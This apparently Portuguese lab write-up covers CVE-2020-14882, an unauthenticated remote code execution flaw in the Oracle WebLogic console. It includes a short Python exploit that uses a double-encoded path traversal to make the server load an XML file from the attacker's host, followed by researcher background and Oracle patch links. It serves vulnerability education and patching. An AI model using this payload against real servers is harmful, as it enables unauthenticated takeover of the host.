
Assunção do Oracle WebLogic Server
CVE-2020-14882 é uma falha de execução remota de código (RCE) no componente Console do Oracle WebLogic Server. A falha de pré-autenticação recebeu uma complexidade de ataque “baixa” e foi destacada como “facilmente explorável” pela Oracle, resultando na atribuição de uma pontuação CVSSv3 crítica de 9.8. A exploração bem-sucedida permitiria que um atacante não autenticado comprometesse o servidor Oracle WebLogic via HTTP e assumisse o controle total do host. (Mais informações - Tenable)
As versões suportadas afetadas são 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 e 14.1.1.0.0.
Vítima (Servidor WebLogic): 192.168.0.15 - Windows 10 PRO executando o Servidor WebLogic.
Atacante (Arquivo XML hospedado): 192.168.0.16 - Kali Linux - GNU/Linux - Debian.
Payload:
import requests
url = http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
'?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' \
'(%22http://192.168.0.16:8000/Documents/teste.xml%22)'.format('192.168.0.15', '7001')
response = requests.get(url)
Este payload chamará uma biblioteca XML do spring framework para enviar uma solicitação a um servidor no domínio do atacante procurando pelo arquivo teste.xml.
Em 28 de outubro, o pesquisador de segurança chamado Jang publicou uma postagem no blog (em vietnamita) sobre o CVE-2020-14882, incluindo detalhes parciais que poderiam ser usados para um PoC. Jang não é estranho às falhas do WebLogic, sendo creditado pela descoberta e relato do CVE-2020-2555 à Oracle, que corrigiu a vulnerabilidade no CPU de janeiro de 2020. Em março, Jang confirmou que o CVE-2020-2555 não foi completamente corrigido. O bypass para o CVE-2020-2555 foi divulgado por outro pesquisador, Quynh Le, do VNPT Information Security Center (ISC). Tanto Le quanto Jang são creditados por reportar esse bypass, que é identificado como CVE-2020-2883. (Mais informações - Tenable)
Oracle WebLogic: CVE-2020-14882 : Atualização Crítica de Patch (Doc ID 2771503.1). (Suporte Oracle)
Oracle Critical Patch Update Advisory - Outubro de 2020. (Suporte Oracle)
Como Mitigar o Impacto do CVE-2020-14882 Weblogic. (Suporte Oracle)
Vulnerabilidade no produto Oracle WebLogic Server do Oracle Fusion Middleware. (Mitre - CVE)